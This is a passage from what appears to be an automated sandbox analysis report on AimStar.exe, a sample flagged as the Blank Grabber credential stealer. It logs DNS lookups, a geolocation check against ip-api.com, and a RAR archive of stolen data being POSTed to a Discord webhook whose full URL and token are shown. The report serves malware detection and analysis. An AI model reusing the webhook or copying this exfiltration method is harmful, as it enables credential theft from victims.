                                                                                                                                                                                                                                        Jan 1, 2025 22:12:36.774527073 CET49830443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:36.775377989 CET49830443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:36.987446070 CET4982480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:36.992539883 CET8049824208.95.112.1192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:36.992695093 CET4982480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.130522966 CET5365653192.168.2.5162.159.36.2
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.135349035 CET5353656162.159.36.2192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.135443926 CET5365653192.168.2.5162.159.36.2
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.135471106 CET5365653192.168.2.5162.159.36.2
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.140206099 CET5353656162.159.36.2192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.588337898 CET5353656162.159.36.2192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.589961052 CET5365653192.168.2.5162.159.36.2
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.594953060 CET5353656162.159.36.2192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.595026016 CET5365653192.168.2.5162.159.36.2
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:02.310291052 CET4931053192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:02.319490910 CET53493101.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:04.557157993 CET5209753192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:04.563998938 CET53520971.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:34.909957886 CET6167053192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:34.916692972 CET53616701.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.619488955 CET5188153192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET53518811.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.129982948 CET5364598162.159.36.2192.168.2.5
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:46.620481968 CET53586251.1.1.1192.168.2.5
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:02.310291052 CET192.168.2.51.1.1.10x5697Standard query (0)skoch-6bauu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:04.557157993 CET192.168.2.51.1.1.10x37daStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:34.909957886 CET192.168.2.51.1.1.10x15c0Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.619488955 CET192.168.2.51.1.1.10x8c2aStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:02.319490910 CET1.1.1.1192.168.2.50x5697Name error (3)skoch-6bauu.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:04.563998938 CET1.1.1.1192.168.2.50x37daNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:34.916692972 CET1.1.1.1192.168.2.50x15c0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET1.1.1.1192.168.2.50x8c2aNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET1.1.1.1192.168.2.50x8c2aNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET1.1.1.1192.168.2.50x8c2aNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET1.1.1.1192.168.2.50x8c2aNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.626837969 CET1.1.1.1192.168.2.50x8c2aNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        • discord.com
                                                                                                                                                                                                                                        • ip-api.com
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.549709208.95.112.1807332C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:04.573261976 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:05.028317928 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 21:12:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Ttl: 60
                                                                                                                                                                                                                                        X-Rl: 44
                                                                                                                                                                                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                        Data Ascii: false


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.549824208.95.112.1807332C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:34.922801018 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                        Jan 1, 2025 22:12:35.406724930 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 21:12:34 GMT
                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 204
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Ttl: 29
                                                                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                        Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.549830162.159.128.2334437332C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC302OUTPOST /api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0 HTTP/1.1
                                                                                                                                                                                                                                        Host: discord.com
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        Content-Length: 726812
                                                                                                                                                                                                                                        User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=156af1f13d18752ec77c0725b357aa90
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 2d 2d 31 35 36 61 66 31 66 31 33 64 31 38 37 35 32 65 63 37 37 63 30 37 32 35 62 33 35 37 61 61 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6b 6f 63 68 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 3a 74 33 3d 21 04 00 00 01 0f e1 e3 87 6f 2e 57 53 11 04 10 27 1c e8 fa 90 19 c7 b3 83 07 5a 88 cf 2f 34 59 60 f4 f0 6d 81 92 0d 5f 15 e6 28 4a 4a b2 1a 60 d3 f0 85 c9 4b 17 74 0c a5 6d a5 47 fd da b7 29 47 fb 5f d2 ba 51 71 9d 8c c0 b5 4e c9 98 cb cf 90 f9 0f 09 81 89 88 43 00 d7 f9
                                                                                                                                                                                                                                        Data Ascii: --156af1f13d18752ec77c0725b357aa90Content-Disposition: form-data; name="file"; filename="Skoch-user.rar"Content-Type: application/octet-streamRar!:t3=!o.WS'Z/4Y`m_(JJ`KtmG)G_QqNC
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 80 7a 93 8f 50 5c 77 1c 86 cf bd 3a 15 a0 ab a2 e8 c5 07 9b 91 3f b2 4b d8 ae 9d 57 4d 00 bd c6 d1 12 84 59 1a 3c 2e 6b ab 55 d0 13 6d 7c 48 eb be 6c 4c 58 65 a0 0e dc 8e 78 a7 2b b8 0e 7a 56 ff c7 1d b6 89 4d ae 49 c5 17 ba 13 46 f0 d9 5f 9b e2 64 5e f2 af 1b 7a 0f fc db b3 9c 24 a8 c9 64 35 d3 f9 69 49 94 11 8b a4 e5 bc 3d 35 c4 43 a0 b6 e1 16 8c 22 c6 8a 90 56 de 17 15 7d 01 8a 90 78 4f f3 19 84 cc 85 80 f1 64 cf b2 bc d9 66 1b 5b 25 3c c1 43 ad 10 55 68 4a 5f 41 10 70 10 b6 47 d6 f2 ab cf 54 d7 18 05 6a 4b 8e e3 6a b2 7e 78 30 c2 75 3e 31 48 74 5c 44 c5 de a4 46 8b 5a 9f 8b a8 0c b1 fa 5e e4 8e 32 63 41 23 4d 8b 66 f6 2b b0 19 0a 4a 18 fc 85 cb d9 f1 36 b0 e3 8b ea 2e fd 5c 4c 50 57 6e e7 96 22 9c 36 8c 09 bf 6a fc 73 c9 2c ee 7d ae 31 91 b2 53 49 1e
                                                                                                                                                                                                                                        Data Ascii: zP\w:?KWMY<.kUm|HlLXex+zVMIF_d^z$d5iI=5C"V}xOdf[%<CUhJ_ApGTjKj~x0u>1Ht\DFZ^2cA#Mf+J6.\LPWn"6js,}1SI
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 44 3b 7e e6 87 b9 35 dd 1d 7f c6 ec 29 da 73 76 2a cb a4 2d 1c 1b 41 df e1 15 f9 43 7f 05 9d 18 7b f6 c3 0e 9a 59 1a c6 f5 a2 cf c4 13 76 23 1b 87 35 d0 40 dd aa 5f bf fa 5b 38 3d 4f f6 09 38 cc e2 00 b9 ee ed b0 4f ea 2c 11 af da 34 d9 23 12 33 68 33 7d 40 69 0d a0 33 08 84 e3 fa 51 d9 fd 3a 54 02 70 18 33 b3 75 b5 51 2d 82 9c 4a 8b b9 b8 0e f5 e6 f0 3e 40 fc 16 c0 c9 e9 ae d8 95 05 1c cd cf 62 b9 db 63 59 55 67 5a 95 96 e6 ab 71 78 db a4 61 6b 28 71 d9 55 a1 fd 58 08 ae 98 99 c9 16 3d 44 48 e3 9d f0 d9 4e db f9 e0 e9 d9 4e d3 18 af 15 f3 56 07 17 05 ff 81 8e b7 f8 07 0d 8c 60 64 74 00 c0 16 88 b2 24 70 3f e5 91 e5 a3 34 dd c3 dc f4 3a c3 5a 91 d6 fd 13 f1 19 26 d9 2a 53 6b ff da cf cb ae b8 e2 39 53 84 77 ae aa 3c f0 48 e8 72 6a fc 59 c1 6e 58 32 2a 76
                                                                                                                                                                                                                                        Data Ascii: D;~5)sv*-AC{Yv#5@_[8=O8O,4#3h3}@i3Q:Tp3uQ-J>@bcYUgZqxak(qUX=DHNNV`dt$p?4:Z&*Sk9Sw<HrjYnX2*v
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 44 73 ba a5 d1 55 66 8e 36 b1 03 60 4d 0b 18 9e 28 ac e4 58 3e cd 29 26 85 f3 33 66 a0 46 7a 92 ea 32 7f 55 14 3a 8a 6a 99 4d ce c3 2f fe 53 3a eb a2 bc 57 b1 d1 25 da 4a 71 e9 75 ca 11 5c 23 ac 78 c8 7b 59 ac 84 a4 8f 5c f2 d0 0f 19 7b 1a a8 88 42 d0 fb aa 54 b4 3a bd e3 04 c8 2c 66 31 51 df a5 c9 90 ad 98 10 e2 1d e6 e4 04 b1 1b b6 7f b5 c7 1b 7d 1c fd e2 f3 5d 4b 3e 3f b9 83 07 fd 1c b6 01 5c 13 e3 42 dc 77 12 af 8e 09 52 44 73 85 da c8 37 64 5a d0 a8 0a 4f eb 35 a2 f2 7e 48 d5 51 68 7b 15 f1 17 e9 48 13 17 e1 e8 e2 00 96 33 9e 2b fb 38 eb d0 42 1c 1b 36 9e 2d 48 c7 fb d0 9f 51 a7 76 8f ab ab 43 91 9a dd 88 58 00 98 e1 78 9a f4 a8 9a 13 c8 24 90 45 7a d9 68 d4 cd 5d 9c 92 24 28 1e 9e 67 cc 4f a4 04 8c 23 b4 c7 41 1b 21 3f 6e 6a fa ef a5 e2 36 9e 01 73
                                                                                                                                                                                                                                        Data Ascii: DsUf6`M(X>)&3fFz2U:jM/S:W%Jqu\#x{Y\{BT:,f1Q}]K>?\BwRDs7dZO5~HQh{H3+8B6-HQvCXx$Ezh]$(gO#A!?nj6s
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: a7 c2 14 12 5f 34 b6 e8 41 29 f9 37 29 1d fc 3b 2a f8 c3 07 50 2a f7 b7 88 de 0c e4 8d 5f 6e 84 79 db b1 00 a1 b4 fe 29 7e 36 19 be 04 24 48 56 4b 8f dc 9c 16 70 d3 f5 17 71 dd 18 c2 4c b0 29 39 65 e9 6d ac 48 ea 77 6e fa 50 47 59 9c 8e 77 01 59 79 22 e0 24 0f 3f 4a 23 7a ae 1e 3d da 3c b9 21 3e fa 02 b4 14 54 20 ec af 41 81 95 58 02 28 04 20 39 f2 4a 34 4e 48 ab 7e ca 96 d7 52 df 1a a5 d2 d2 0b da 46 03 83 90 72 b8 11 87 41 4c 40 08 58 fb 31 f3 a1 8c 26 49 49 62 dd aa 11 21 0d 9e 7f 87 3d b9 0a 51 cd 39 1b 47 bc 36 bd b7 95 d8 a9 a8 1e f7 4e b3 b8 a3 9a ab 5c ad 5e 30 d0 e6 45 46 81 78 cf ae a6 28 e9 ff b2 2c 18 33 27 1e 48 4a a3 56 6c 66 7e 03 e9 60 22 73 38 f0 fd fe 4f 65 cc 7f dd 07 61 46 96 16 24 c3 6b 72 12 2d 62 d3 15 22 df 12 f6 b5 a3 f1 0f 55 2a
                                                                                                                                                                                                                                        Data Ascii: _4A)7);*P*_ny)~6$HVKpqL)9emHwnPGYwYy"$?J#z=<!>T AX( 9J4NH~RFrAL@X1&IIb!=Q9G6N\^0EFx(,3'HJVlf~`"s8OeaF$kr-b"U*
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 55 8b b5 04 7d aa 50 5c f6 a8 f3 5b 7d f7 07 27 f1 55 f3 cb 15 22 f0 06 22 8b cb fc 16 7a fd 1d 0b a0 90 48 28 aa b9 b6 3b a5 87 12 cc ec 2f 43 77 84 ac ac 28 6d ca ee f5 f4 a2 2b d9 39 37 e0 64 25 83 20 3c d6 a3 0a 5e c7 d7 1b f0 bc 90 ec 0d 80 59 c3 3d 26 16 98 2a e3 23 93 9e 6d 94 ed 00 c5 e9 8f cd d0 86 86 c9 4a 50 a5 d7 31 bb f9 22 dc 06 54 dc 2d 27 92 3e 24 a8 e3 96 3b 51 98 cb 23 52 a7 d2 fd be f2 53 39 d9 4e df 7a af bf fd da d8 0a a3 59 90 5b a3 53 40 4c 3b a2 a2 23 35 21 1c 48 33 d1 b3 c7 43 94 ce 0e e8 7a 69 f4 ed 17 64 11 82 75 4b aa 72 94 a1 4e a4 b3 92 5a 5e 64 3b 03 cd 15 37 ae c0 94 fb 6e af 84 b6 fd 8f 36 64 b2 ea a8 89 d4 b2 0d 0a e4 e7 64 60 f4 3c 32 9d b7 e8 b1 45 57 ca 5d eb e9 06 aa 7a 19 ab bf f6 7f 15 d8 43 a1 66 c0 2c 42 d9 6d a3
                                                                                                                                                                                                                                        Data Ascii: U}P\[}'U""zH(;/Cw(m+97d% <^Y=&*#mJP1"T-'>$;Q#RS9NzY[S@L;#5!H3CziduKrNZ^d;7n6dd`<2EW]zCf,Bm
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 1d f9 b1 7f 47 8d c1 db be 55 fe b0 a8 f6 79 a7 ec 0e 7e e6 92 dc 75 80 0e f1 e4 fd 48 3f 86 3a 56 3d a9 6e f6 2f f1 3a e9 19 89 bc be 41 bd a7 54 73 89 a0 6c d2 fb 31 55 ee e6 be 18 96 90 d6 75 94 4a 5d 8c d6 c4 8e e5 54 84 32 f6 45 23 21 2c 4b 6d ba 4d dc 96 7a 25 a6 b1 c2 9b 41 12 b1 2c 12 dd b3 a5 70 cf 49 ae ee 20 47 3c ca 51 81 1d d9 6d b1 65 10 02 c2 71 b6 e0 69 6f 0e 51 9e 5f 0f 22 57 18 b1 26 c4 03 75 33 31 97 50 b5 f1 18 ab d1 5f 82 c0 1e fa 01 be 18 cf 31 23 15 70 6d 78 f2 6a 77 10 38 41 e5 b1 a0 2f f9 1d db 62 3d ad 1d 28 fa 54 c6 82 86 21 d2 2f 69 1e 05 a7 14 4b fe b4 06 e3 92 90 a8 31 bd 32 33 d5 95 29 38 92 f1 2d ca 5c 82 cb 1e d7 db c7 f1 04 4e 4c e6 06 7d e1 02 b1 df f8 18 8c c5 5f b6 1e c3 c3 1f f0 58 24 d9 68 de 61 4a 96 ba 5c 28 91 35
                                                                                                                                                                                                                                        Data Ascii: GUy~uH?:V=n/:ATsl1UuJ]T2E#!,KmMz%A,pI G<QmeqioQ_"W&u31P_1#pmxjw8A/b=(T!/iK123)8-\NL}_X$haJ\(5
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: 0e a8 6a 71 2e 4b a9 d9 94 49 cb 8e 86 87 98 e7 78 30 32 9e 3d 4e 2c 65 9c 4e 3b 7c 25 a7 55 75 be 71 ad 20 37 f3 41 78 81 df 16 6e 40 7f 81 39 a7 4f ce da b6 a6 87 d2 3e e7 25 66 1e f0 3f 89 30 07 c3 81 48 71 f8 13 05 7b 2f ca 39 9d 4f 5c 28 30 49 3c 32 3f 50 64 8b 3e 4b 00 f0 f7 13 2f b5 86 94 93 e3 12 35 a9 4a ab af 2f f9 36 d8 bc 3e 91 a8 3b a0 db f4 a3 29 09 db 0d 0b 27 cd 25 fa 45 c7 38 47 6e c9 0b 3b 1e 29 15 6d 2c 27 ef 13 89 9f e7 38 f5 49 7b b2 04 4e 4c 28 b0 e0 59 9e 54 56 9c 49 b3 e4 c2 58 c8 5a 2b 99 a1 a1 e0 4f 06 9d 80 b3 e2 26 db 39 90 01 9b 25 c4 11 54 0c 6c 8d 7c 3c f9 85 40 e2 a8 62 38 e8 3c 8b 2d e2 0e 75 4e 3d 45 1e d3 50 9b 55 4e cd 91 1a 31 2d bc 24 c5 fb 1d fe ba aa 4e c3 28 b1 f6 5b 54 6f e2 f4 33 be ba f2 0e 5d 68 36 17 8b 29 21
                                                                                                                                                                                                                                        Data Ascii: jq.KIx02=N,eN;|%Uuq 7Axn@9O>%f?0Hq{/9O\(0I<2?Pd>K/5J/6>;)'%E8Gn;)m,'8I{NL(YTVIXZ+O&9%Tl|<@b8<-uN=EPUN1-$N([To3]h6)!
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: a0 74 40 40 2c d8 38 a3 8c 17 a6 1d 29 a4 f3 4d 2c ad 06 ca 35 c3 17 55 be cf c3 9b 50 5b fc 3b 3e ee 38 4b 77 2c 7a b1 71 5c 04 62 1e fe 92 ac a4 54 17 5e 55 4d 93 c3 b0 39 97 02 71 b2 b0 f4 97 bb e5 0c e5 7a ab c2 28 84 a5 ee b8 2a 77 b4 32 37 a1 9a 58 4e 06 ca 47 69 60 35 78 c5 7e d7 0e 8d 35 a4 8a 8f 92 2b 4f 31 b6 0c a3 87 31 81 8c 6f 8e e8 78 39 a0 22 0a 4e c2 e5 11 26 eb db 05 6d 08 57 87 87 27 b1 b8 4b 56 ae e3 3f 92 f3 e2 c2 54 2f 57 85 82 c5 9c d7 01 b6 28 68 1b eb 5e d3 59 b7 f1 cf 9b fc 80 d0 d0 36 40 94 94 60 5e 37 0d 86 62 9b 27 62 a7 24 e9 49 be ed 59 f5 46 13 38 7b a7 e3 1b b2 52 84 e5 49 58 4c ec 20 21 f3 c9 a2 79 7e e6 52 f0 0f 2d 6b 0f 0b df e3 fd 77 c8 00 00 7d 10 81 98 c9 f7 aa b6 1e 12 9f f7 76 71 b4 33 89 00 c5 1c cb ae 2f 5b 11 c3
                                                                                                                                                                                                                                        Data Ascii: t@@,8)M,5UP[;>8Kw,zq\bT^UM9qz(*w27XNGi`5x~5+O11ox9"N&mW'KV?T/W(h^Y6@`^7b'b$IYF8{RIXL !y~R-kw}vq3/[
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC16384OUTData Raw: eb b8 d6 42 5e f3 e1 7d 31 90 b6 e3 45 3e 3b 04 23 8f 85 b8 f7 3a d9 ee 1f 4b 65 15 a2 05 3c bc 8d b4 ea 92 fa 91 27 2f f2 a2 a1 56 0b 1f 6a 68 84 08 e1 8b 09 fc 5d 98 31 af 3f 2d 01 51 04 bf c0 68 5b cf 0d 51 88 4b 93 31 c9 7b 3c 82 a2 49 30 cd 35 ef ba ea 77 97 cd cd 09 c4 d5 84 e4 22 9a f1 89 00 1a 18 be 9b f9 f5 2f ad ef 22 f8 67 91 11 2d 00 ac 12 91 53 ba 84 6e 22 05 7b de bc 18 a8 66 c8 18 e1 8c 68 9f 7c c1 1a ae 32 de f3 04 b7 5e 62 74 34 8b 34 bd fa 00 8e 6c 6b 2f 79 d5 86 1b e6 b4 85 d0 1f 3e f0 fb ef 81 01 d6 0e 5b 8b 40 a7 51 d5 e5 8a 89 03 eb 33 b2 94 57 b5 43 4f cd d0 f6 3a 35 2a 93 b3 0b e5 51 0b e4 6e cc 5a 0d 4e 76 22 eb ab 3a 94 d3 86 6a 42 6f 51 e7 58 32 fa cf d1 ae cd b7 8e f7 09 b4 f3 c2 9a a1 98 ba 4b 17 e7 d1 2e 0d f4 12 f6 68 77 25
                                                                                                                                                                                                                                        Data Ascii: B^}1E>;#:Ke<'/Vjh]1?-Qh[QK1{<I05w"/"g-Sn"{fh|2^bt44lk/y>[@Q3WCO:5*QnZNv":jBoQX2K.hw%
                                                                                                                                                                                                                                        2025-01-01 21:12:36 UTC1255INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 21:12:36 GMT
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Content-Length: 45
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                        x-ratelimit-limit: 5
                                                                                                                                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                                                                                                                                        x-ratelimit-reset: 1735765958
                                                                                                                                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhGPHmf2CkQpxNJKrU3FALioK3d3Ezz5k2Wlz3Gfy8iHMBtU9bCd4dyhhw7icRi4woK8y%2F9mPBpUzTjNLSNTRAg9mhGkdZpOuJlrCyBMoMlGIciOTqFl0%2Bu62jFi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Set-Cookie: __cfruid=a3e5254bb13bbfd0eab3271a2cd309bfca598747-1735765956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                        Set-Cookie: _cfuvid=aOFeXPXGF_hja_MGT_l13.d1SgVHLQwWi5_dvT69AJo-1735765956727-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8fb5822a1b5f32d3-EWR


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:16:11:57
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\AimStar.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff710f40000
                                                                                                                                                                                                                                        File size:8'116'372 bytes
                                                                                                                                                                                                                                        MD5 hash:9E5A9429BC193EE14EBC1F87201BE518
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:16:11:57
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\AimStar.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff710f40000
                                                                                                                                                                                                                                        File size:8'116'372 bytes
                                                                                                                                                                                                                                        MD5 hash:9E5A9429BC193EE14EBC1F87201BE518
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
